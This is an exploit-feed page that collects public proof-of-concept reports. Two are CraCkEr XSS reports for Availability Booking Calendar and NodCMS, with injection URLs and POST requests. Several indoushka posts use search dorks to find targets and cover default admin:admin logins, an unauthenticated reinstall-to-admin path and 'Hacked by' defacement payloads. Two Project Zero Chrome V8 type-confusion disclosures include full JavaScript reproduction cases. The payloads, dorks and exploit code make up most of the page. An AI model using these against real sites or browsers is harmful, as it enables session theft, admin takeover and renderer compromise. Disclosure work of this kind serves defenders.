Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/availability-booking-calendar-php.html │ │ Vendor : GZ Scripts │ │ Software : Availability Booking Calendar 1.8 │ │ Vuln Type: Reflected XSS - Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Reflected XSS │ │ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ │ │ │ Stored XSS │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /load.php GET 'cid' parameter is vulnerable to RXSS https://website/load.php?controller=GzFront&action=calendar&cid=1vqvby%22%3e%3cscript%3ealert(1)%3c%2fscript%3eg6vt7wmumdm&view_month=1&cal_id=1&month=7&year=2023 ## Stored XSS ----------------------------------------------- POST /AvailabilityBookingCalendarPHP/load.php?controller=GzFront&action=checkout&cid=1 HTTP/1.1 date_range=03.07.2023+-+04.07.2023&abadults=&abchildren=&adults=1&children=1&promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=000&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=yyy&state=sss&zip=00000&country=LEB&terms=1&start_date=1688342400&end_date=1688428800&cal_id=1&calendar_id=1&from_date=1688342400&to_date=1688428800&payment_method=pay_arrival&create_booking=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Choose any Day Colored by Green on the Calendar 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Address Line 1" 5. Inject your [XSS Payload] in "Country" 6. Accept with terms & Press [Booking] XSS Fired on Local User Browser 7. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 8. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index) XSS Will Fire and Executed on his Browser [-] Done </code></pre>

<pre><code>==================================================================================================================================== | # Title : Anonymous Feedback Script V2.1 xss Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://codecanyon.net/item/anonymous-feedback-script/20633311 | | # Dork : "Welcome to Anonymous Feedback - Anonymous Feedback" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload in search box: install/index.php/"<marquee>Hacked by indoushka</marquee>" [+] http://127.0.0.1/www/naizknet/install/index.php/%22%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%22 ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>=================================================================== | # Title : AMSS++ v 4.2 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on: windows 8.1 Français V.(Pro) | | # Vendor : http://amssplus.ubn4.go.th/amssplus_download/ | | # Dork : Education Area Management Support System : AMSS++ | =================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] Use Login : user + pass : admin ====Greetings to :======================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ========================================================================================================================================= </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://nodcms.com/ - https://github.com/khodakhah/nodcms │ │ Vendor : NodCMS by Chic Theme │ │ Software : NodCMS 3.4.1 - Stored XSS │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ------------------------------------------------------------ POST /en/blog-comment-4 HTTP/1.1 comment_name=[XSS Payload]&comment_content=[XSS Payload] ------------------------------------------------------------ POST parameter 'comment_name' is vulnerable to XSS POST parameter 'comment_content' is vulnerable to XSS ## Steps to Reproduce: 1. Surf (as Guest) "Without Register on Website" 2. Go to [Blog] on this Path (https://website/en/blog) 3. Click [Send a comment] 4. Inject your [XSS Payload] in "Name" 5. Inject your [XSS Payload] in "Comment" 6. Send 7. XSS will Fire & Execute in the visitor's Browser when they visit the page you comment on 6. When ADMIN Visit [Client's Comments] to Check [Blog comments list] in Administration Panel on this Path (https://website/admin-blog/comments 8. XSS will Fire & Executed on his Browser [-] Done </code></pre>

<pre><code>==================================================================================================================================== | # Title : Advanced Testimonials Manager v5.5 Reinstall Add Admin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194 | | # Dork : Advanced Testimonial Manager | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] allows an unauthenticated user to update passwords. [+] Use payload : /install.php [+] http://127.0.0.1/www/propertymanagementrv.com/testimonials/install.php = add your information to login ====Greetings to :======================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ========================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Active super shop v1.5.2 HTML inject Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : https://activeitzone.com/demo/shop_v1.5.2_demo/ | | # Dork : "Home || Active Super Shop" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Register new member . [+] go to edit your profil https://127.0.0.1/activeitzone/com/demo/shop_v1.5.2_demo/ [+] edit your profil , put your code or use this code for test in First Name case or Last Name or ...etc : <marquee>Hacked by indoushka</marquee> </tr> <td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a> </tr> ====Greetings to :======================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ========================================================================================================================================= </code></pre>

<pre><code>Chrome: Extending non-extensible objects leads to type confusion in V8 SUMMARY `v8::internal::JSObject::SetAccessor` doesn't check if the receiver is extensible before adding a new property. A potential attacker can exploit the ability to extend non-extensible objects to achieve arbitrary code execution inside the renderer process. VULNERABILITY DETAILS In Blink, when a user calls `window.open(url)` or inserts an `iframe` element with a non-empty URL, the process immediately loads an initial empty document and then initiates navigation to the requested URL. In that case, initialization of the extension subsystem is delayed[1]. If the requested document has the same origin as the empty document, the navigation will reuse the existing global object[2]. When the delayed initialization is resumed, `UpdateBindingsForContext` calls `GetOrCreateChrome`[3], which fetches the `chrome` property value from the global object[5] and defines new properties on `chrome` using `SetLazyDataProperty`[4]. By that time, a user may have replaced the original `chrome` object with a JS value of their choice. `SetLazyDataProperty` is a wrapper around `SetAccessor`. Usually, the function `CheckIfCanDefine` is invoked before adding a property to make sure the receiver is extensible and it doesn't have a non-configurable property with the same name. Unfortunately, `SetAccessor` only verifies the latter with a custom check[6], so, by combining this issue with the extension system initialization quirk, an attacker can define a new accessor property on any non-extensible object. There are likely multiple techniques to exploit the flaw; one such technique abuses the code that implements JS module support. V8 exposes exported module properties via `JSModuleNamespace` objects and relies on them being non-extensible. The engine assumes that for every accessor property in `JSModuleNamespace` there is a corresponding export entry in the linked `JSModule` object and skips security-critical checks. If the attacker creates a bogus export accessor, and V8 attempts to compute an IC handler for it, the process will hit a DCHECK[7] in debug builds, and pass the invalid entry `kNotFound` to `EntryToValueIndex`[8] in release builds. The resulting index will point to the \"number of elements\" field in the hash table, which will be interpreted by the handler as a compressed pointer to a `Cell` object[9]. The value of the cell will be returned to the user code. This behavior is essentially a well-known `fakeobj` exploitation primitive. REFERENCES https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:extensions/renderer/extension_frame_helper.cc;drc=e0e0d24aaa54727dc0a8bc4b159ccdf80d3f5d8d;l=380 ``` void ExtensionFrameHelper::DidCreateScriptContext( v8::Local<v8::Context> context, int32_t world_id) { if (world_id == blink::kMainDOMWorldId) { // Accessing MainWorldScriptContext() in ReadyToCommitNavigation() may // trigger the script context initializing, so we don't want to initialize a // second time here. if (is_initializing_main_world_script_context_) return; if (render_frame()->IsBrowserSideNavigationPending()) { // Defer initializing the extensions script context now because it depends // on having the URL of the provisional load which isn't available at this // point. // We can come here twice in the case of window.open(url): first for // about:blank empty document, then possibly for the actual url load // (depends on whoever triggers window proxy init), before getting // ReadyToCommitNavigation. delayed_main_world_script_initialization_ = true; // *** [1] *** return; } [...] ``` https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:third_party/blink/renderer/core/loader/document_loader.cc;drc=e0e0d24aaa54727dc0a8bc4b159ccdf80d3f5d8d;l=2171 ``` void DocumentLoader::InitializeWindow(Document* owner_document) { [...] // In some rare cases, we'll re-use a LocalDOMWindow for a new Document. For // example, when a script calls window.open(\"...\"), the browser gives // JavaScript a window synchronously but kicks off the load in the window // asynchronously. Web sites expect that modifications that they make to the // window object synchronously won't be blown away when the network load // commits. To make that happen, we \"securely transition\" the existing // LocalDOMWindow to the Document that results from the network load. See also // Document::IsSecureTransitionTo. if (!ShouldReuseDOMWindow(frame_->DomWindow(), security_origin.get(), window_anonymous_matching)) { // *** [2] *** [...] ``` https://source.chromium.org/chromium/chromium/src/+/main:extensions/renderer/native_extension_bindings_system.cc;drc=02335a6b11d934d954cb4d7e02e5c66e1f37f191;l=503 ``` void NativeExtensionBindingsSystem::UpdateBindingsForContext( ScriptContext* context) { v8::Isolate* isolate = context->isolate(); v8::HandleScope handle_scope(isolate); v8::Local<v8::Context> v8_context = context->v8_context(); v8::Local<v8::Object> chrome = GetOrCreateChrome(v8_context); // *** [3] *** if (chrome.IsEmpty()) { return; } DCHECK(GetBindingsDataFromContext(v8_context)); auto set_accessor = [chrome, isolate, v8_context](base::StringPiece accessor_name) { v8::Local<v8::String> api_name = gin::StringToSymbol(isolate, accessor_name); v8::Maybe<bool> success = chrome->SetLazyDataProperty( // *** [4] *** v8_context, api_name, &BindingAccessor, api_name); return success.IsJust() && success.FromJust(); }; ``` https://source.chromium.org/chromium/chromium/src/+/main:extensions/renderer/native_extension_bindings_system.cc;drc=57b92c9b9630156148f8589ffe6e0ee857a791c4;l=116 ``` v8::Local<v8::Object> GetOrCreateChrome(v8::Local<v8::Context> context) { // Ensure that the creation context for any new chrome object is |context|. v8::Context::Scope context_scope(context); // TODO(devlin): This is a little silly. We expect that this may do the wrong // thing if the window has set some other 'chrome' (as in the case of script // doing 'window.chrome = true'), but we don't really handle it. It could also // throw exceptions or have unintended side effects. // On the one hand, anyone writing that code is probably asking for trouble. // On the other, it'd be nice to avoid. I wonder if we can? v8::Local<v8::String> chrome_string = gin::StringToSymbol(context->GetIsolate(), \"chrome\"); v8::Local<v8::Value> chrome_value; if (!context->Global()->Get(context, chrome_string).ToLocal(&chrome_value)) // *** [5] *** return v8::Local<v8::Object>(); [...] ``` https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-objects.cc;drc=4becb939339f1de4744f95b9fcb10bda57cf7e99;l=4748 ``` MaybeHandle<Object> JSObject::SetAccessor(Handle<JSObject> object, Handle<Name> name, Handle<AccessorInfo> info, PropertyAttributes attributes) { Isolate* isolate = object->GetIsolate(); PropertyKey key(isolate, name); LookupIterator it(isolate, object, key, LookupIterator::OWN_SKIP_INTERCEPTOR); [...] CHECK(GetPropertyAttributes(&it).IsJust()); // ES5 forbids turning a property into an accessor if it's not // configurable. See 8.6.1 (Table 5). if (it.IsFound() && !it.IsConfigurable()) { // *** [6] *** return it.factory()->undefined_value(); } it.TransitionToAccessorPair(info, attributes); return object; } ``` https://source.chromium.org/chromium/chromium/src/+/main:v8/src/ic/ic.cc;drc=1f3358ace7565e5efc4f49611d97838901ae13f2;l=843 ``` MaybeObjectHandle LoadIC::ComputeHandler(LookupIterator* lookup) { [...] case LookupIterator::ACCESSOR: { Handle<JSObject> holder = lookup->GetHolder<JSObject>(); [...] if (holder->IsJSModuleNamespace()) { Handle<ObjectHashTable> exports( Handle<JSModuleNamespace>::cast(holder)->module().exports(), isolate()); InternalIndex entry = exports->FindEntry(isolate(), roots, lookup->name(), Smi::ToInt(lookup->name()->GetHash())); // We found the accessor, so the entry must exist. DCHECK(entry.is_found()); // *** [7] *** int value_index = ObjectHashTable::EntryToValueIndex(entry); // *** [8] *** Handle<Smi> smi_handler = LoadHandler::LoadModuleExport(isolate(), value_index); if (holder_is_lookup_start_object) { return MaybeObjectHandle(smi_handler); } return MaybeObjectHandle(LoadHandler::LoadFromPrototype( isolate(), map, holder, smi_handler)); } [...] ``` https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/ic/accessor-assembler.cc;drc=e0e0d24aaa54727dc0a8bc4b159ccdf80d3f5d8d;l=647 ``` void AccessorAssembler::HandleLoadICSmiHandlerLoadNamedCase( const LazyLoadICParameters* p, TNode<Object> holder, TNode<Uint32T> handler_kind, TNode<Word32T> handler_word, Label* rebox_double, TVariable<Float64T>* var_double_value, TNode<MaybeObject> handler, Label* miss, ExitPoint* exit_point, ICMode ic_mode, OnNonExistent on_nonexistent, ElementSupport support_elements) { [...] BIND(&module_export); { Comment(\"module export\"); TNode<UintPtrT> index = DecodeWordFromWord32<LoadHandler::ExportsIndexBits>(handler_word); TNode<Module> module = LoadObjectField<Module>(CAST(holder), JSModuleNamespace::kModuleOffset); TNode<ObjectHashTable> exports = LoadObjectField<ObjectHashTable>(module, Module::kExportsOffset); TNode<Cell> cell = CAST(LoadFixedArrayElement(exports, index)); // *** [9] *** // The handler is only installed for exports that exist. TNode<Object> value = LoadCellValue(cell); Label is_the_hole(this, Label::kDeferred); GotoIf(IsTheHole(value), &is_the_hole); exit_point->Return(value); [...] } ``` VERSION Google Chrome 113.0.5672.63 (Official Build) (64-bit) REPRODUCTION CASE ``` <body> <script> const PROP_COUNT = 2 ** 10; // Controls the fake Cell address. const IC_WARMUP_COUNT = 10; if (top == window) { function generateModuleUrl() { let url = \"data:text/javascript,export let \"; for (let i = 0; i < PROP_COUNT; ++i) url += (i ? \",\" : \"\") + `p${i}`; return url; } let frame = document.createElement(\"iframe\"); frame.src = location; // Must be set before attaching the frame. document.body.appendChild(frame); let child_window = frame.contentWindow; // The `chrome` object must be from the same context as the `window` object. queueMicrotask(_ => child_window.eval(\"import(top.generateModuleUrl())\") .then(module => { child_window.chrome = module; child_window.onload = () => { frame.remove(); // prevents `app` from being reconfigured as a data property. function accessIC() { return module.app; } for (let i = 0; i < IC_WARMUP_COUNT; ++i) accessIC(); document.body.textContent = \"leaked: \" + accessIC(); } })); } </script> </body> ``` CREDIT INFORMATION Sergei Glazunov of Google Project Zero This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-08-06. Related CVE Numbers: CVE-2023-2936. Found by: glazunov@google.com </code></pre>

<pre><code>Chrome: Type confusion in v8::internal::Object::SetPropertyWithAccessor VULNERABILITY DETAILS When `SetSuperProperty` can't find the requested property in the holder, it performs an `OWN` lookup on the receiver. If the receiver has a property interceptor installed, the function invokes the interceptor's descriptor callback[1] and, if the callback opts not to intercept the request[2], creates a new property by calling `CreateDataProperty` on the original lookup iterator[3]. Some descriptor callbacks, for example, the one used with `HTMLCollection` objects, call `GetRealNamedPropertyAttributesInPrototypeChain`[4] to ensure they don't hide an existing property in the prototype chain. The function works by creating a lookup iterator that starts with the receiver's prototype and calling `GetPropertyAttributes` on it. Finally, if `GetPropertyAttributes` encounters a JavaScript Proxy object, it runs the descriptor handler of the proxy. This creates a user code reentrancy point. The problem is that the user code in the proxy handler might invalidate `own_lookup`, which is used in [3], by modifying the object, for example, by creating a property with the same name. In this scenario, `own_lookup` will be in the `NOT_FOUND` state, and `CreateDataProperty` will attempt to add a second property with the same name. This primitive has been abused multiple times in the past, including exploits detected in the wild, to break field type tracking and bypass security-critical checks in TurboFan. Therefore, last year a hardening patch was landed[6] that catches duplicate properties in \"fast property\" mode objects. We were aware of the fact that it would still be possible to create duplicate properties in \"dictionary mode\" objects with a similar vulnerability, however, even if such an object is converted to the fast mode, its field types are generalized i.e. useless for field type tracker. It turns out there's a way to exploit the duplicate property primitive without abusing field type tracking or TurboFan at all. The basic idea is that, depending on the current order of the properties, a property lookup for a duplicate property name might return a different value, and an object shape change, for example, transitioning between \"fast\" and \"dictionary\" properties, might reshuffle the properties. More specifically, when `DefineOwnPropertyIgnoreAttributes` encounters a special `AccessorInfo` property and the requested attributes don't match the current ones, it will first call `TransitionToAccessorPair`[7] to update the attributes. `TransitionToAccessorPair` might reshape the object twice if needed: first from \"fast\" to \"slow\"[9] and then back to \"fast\"[10]. After that, it restarts the lookup in the current object[11]. However, if the property is a duplicate, the new lookup might point to a different value which isn't even an accessor. This value is later used for the `SetPropertyWithAccessor` call[8]. In debug builds, this will lead to the `DCHECK_EQ(ACCESSOR, state_)` assertion failure in `LookupIterator::GetAccessors`. In release builds, a value of an attacker's choice will be interpreted as an `AccessorPair` object. REFERENCES https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/objects.cc;drc=f49e998b8d369971b65bc980846d2395bf4dee30;l=2665 ``` Maybe<bool> Object::SetSuperProperty(LookupIterator* it, Handle<Object> value, StoreOrigin store_origin, Maybe<ShouldThrow> should_throw) { Isolate* isolate = it->isolate(); if (it->IsFound()) { bool found = true; Maybe<bool> result = SetPropertyInternal(it, value, should_throw, store_origin, &found); if (found) return result; } [...] Handle<JSReceiver> receiver = Handle<JSReceiver>::cast(it->GetReceiver()); // Note, the callers rely on the fact that this code is redoing the full own // lookup from scratch. LookupIterator::Configuration c = LookupIterator::OWN; LookupIterator own_lookup = it->IsElement() ? LookupIterator(isolate, receiver, it->index(), c) : LookupIterator(isolate, receiver, it->name(), c); for (; own_lookup.IsFound(); own_lookup.Next()) { switch (own_lookup.state()) { [...] case LookupIterator::INTERCEPTOR: case LookupIterator::JSPROXY: { PropertyDescriptor desc; Maybe<bool> owned = JSReceiver::GetOwnPropertyDescriptor(&own_lookup, &desc); // *** [1] *** MAYBE_RETURN(owned, Nothing<bool>()); if (!owned.FromJust()) { // *** [2] *** if (!CheckContextualStoreToJSGlobalObject(&own_lookup, should_throw)) { return Nothing<bool>(); } return JSReceiver::CreateDataProperty(&own_lookup, value, // *** [3] *** should_throw); } [...] } https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:out/Debug/gen/third_party/blink/renderer/bindings/core/v8/v8_html_collection.cc;drc=332f92aab4a32607f7813ac1a824f6ff0d86c369;l=197 ``` void V8HTMLCollection::NamedPropertyDescriptorCallback( v8::Local<v8::Name> v8_property_name, const v8::PropertyCallbackInfo<v8::Value>& info) { RUNTIME_CALL_TIMER_SCOPE_DISABLED_BY_DEFAULT( info.GetIsolate(), \"Blink_HTMLCollection_NamedPropertyDescriptor\"); // LegacyPlatformObjectGetOwnProperty // https://webidl.spec.whatwg.org/#LegacyPlatformObjectGetOwnProperty v8::Local<v8::Object> v8_receiver = info.Holder(); v8::Isolate* isolate = info.GetIsolate(); v8::Local<v8::Context> current_context = isolate->GetCurrentContext(); // step 2.1. If the result of running the named property visibility algorithm // with property name P and object O is true, then: if (v8_receiver ->GetRealNamedPropertyAttributesInPrototypeChain(current_context, // *** [4] *** v8_property_name) .IsJust()) { return; // Do not intercept. Fallback to OrdinaryGetOwnProperty. } [...] } ``` https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-objects.cc;drc=181f556032737223b6e43a48b81943b2f990daa8;l=753 ``` Maybe<PropertyAttributes> JSReceiver::GetPropertyAttributes( LookupIterator* it) { for (; it->IsFound(); it->Next()) { switch (it->state()) { [...] case LookupIterator::JSPROXY: return JSProxy::GetPropertyAttributes(it); // *** [5] *** [...] ``` [6] - https://source.chromium.org/chromium/_/chromium/v8/v8.git/+/3c7f274770e90b766ed554a6ca599e70341c9735 https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-objects.cc;drc=181f556032737223b6e43a48b81943b2f990daa8;l=3650 ``` Maybe<bool> JSObject::DefineOwnPropertyIgnoreAttributes( LookupIterator* it, Handle<Object> value, PropertyAttributes attributes, Maybe<ShouldThrow> should_throw, AccessorInfoHandling handling, EnforceDefineSemantics semantics, StoreOrigin store_origin) { [...] case LookupIterator::ACCESSOR: { Handle<Object> accessors = it->GetAccessors(); // Special handling for AccessorInfo, which behaves like a data // property. if (accessors->IsAccessorInfo() && handling == DONT_FORCE_FIELD) { PropertyAttributes current_attributes = it->property_attributes(); // Ensure the context isn't changed after calling into accessors. AssertNoContextChange ncc(it->isolate()); // Update the attributes before calling the setter. The setter may // later change the shape of the property. if (current_attributes != attributes) { it->TransitionToAccessorPair(accessors, attributes); // *** [7] *** } return Object::SetPropertyWithAccessor(it, value, should_throw); // *** [8] *** } ``` https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/objects/lookup.cc;drc=332f92aab4a32607f7813ac1a824f6ff0d86c369;l=815 ``` void LookupIterator::TransitionToAccessorPair(Handle<Object> pair, PropertyAttributes attributes) { Handle<JSObject> receiver = GetStoreTarget<JSObject>(); holder_ = receiver; PropertyDetails details(PropertyKind::kAccessor, attributes, PropertyCellType::kMutable); if (IsElement(*receiver)) { [...] } else { PropertyNormalizationMode mode = CLEAR_INOBJECT_PROPERTIES; if (receiver->map(isolate_).is_prototype_map()) { JSObject::InvalidatePrototypeChains(receiver->map(isolate_)); mode = KEEP_INOBJECT_PROPERTIES; } // Normalize object to make this operation simple. JSObject::NormalizeProperties(isolate_, receiver, mode, 0, // *** 9 *** \"TransitionToAccessorPair\"); JSObject::SetNormalizedProperty(receiver, name_, pair, details); JSObject::ReoptimizeIfPrototype(receiver); // *** [10] *** ReloadPropertyInformation<false>(); // *** [11] *** } } ``` VERSION Google Chrome 112.0.5615.137 (Official Build) (arm64) Chromium 115.0.5737.0 (Developer Build) (64-bit) REPRODUCTION CASE ``` <body> <script> class Utils { static bigIntAsDouble(big_int) { Utils.#big_int_array[0] = big_int; return Utils.#double_array[0]; } static transitionToSlow(object) { try { // `SetOrCopyDataProperties` will make `object` transition to slow properties // then throw while trying to access the first property of `source.` Object.assign(object, Utils.#slow_source); } catch { } } static transitionToFastPrototype(object) { // Assigning `__proto__` will make `object` transition to a prototype map. // `Enumerate` will call `MakePrototypesFast`. for (let x in { __proto__ : object }) {} } // Some interceptors call `GetRealNamedPropertyAttributesInPrototypeChain`. If there is a JSProxy // in the prototype chain, the function will attempt to invoke the `getOwnPropertyDescriptor` handler. static setInterceptorOnceCallback(object, callback) { let prototype = Object.getPrototypeOf(object); let grand_prototype = Object.getPrototypeOf(prototype); Object.setPrototypeOf(prototype, new Proxy({}, {get getOwnPropertyDescriptor() { Object.setPrototypeOf(prototype, grand_prototype); callback(); }})); } static #big_int_array = new BigUint64Array(1); static #double_array = new Float64Array(Utils.#big_int_array.buffer); static #slow_source = {}; static { for (let i = 0; i < 2048; ++i) { Object.defineProperty(Utils.#slow_source, `p${i}`, {enumerable: true, get() { throw 1 }}); } } }; // Used by `Error.captureStackTrace`. const PROPERTY_NAME = \"stack\"; function trigger(index) { // The collections are cached; pass an index to get a new one each time. let object = document.getElementsByTagName(index); Utils.setInterceptorOnceCallback(object, _ => { // Needed to force `ReoptimizeIfPrototype` inside `TransitionToAccessorPair`. Utils.transitionToFastPrototype(object); Error.captureStackTrace(object); // Trigger `TransitionToAccessorPair` -- makes `object` fast. Object.defineProperty(object, \"stack\", {enumerable: false}); Utils.transitionToSlow(object); // Add more properties to rehash the dictionary. for (let i = 0; i < index; ++i) { object[`p${i}`] = 1; } }); // Pass a holder that doesn't contain the property to trigger a second lookup. // The stored value will be interpreted as an accessor object later. Reflect.set({}, PROPERTY_NAME, Utils.bigIntAsDouble(0x4141414141414141n), object); // Trigger `TransitionToAccessorPair` again. Object.defineProperty(object, PROPERTY_NAME, {enumerable: true, value: 1}); } for (let index = 0; index < 1000; ++index) trigger(index); location.reload(); </script> </body> ``` CREDIT INFORMATION Sergei Glazunov of Google Project Zero This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-26. Related CVE Numbers: CVE-2023-2935. Found by: glazunov@google.com </code></pre>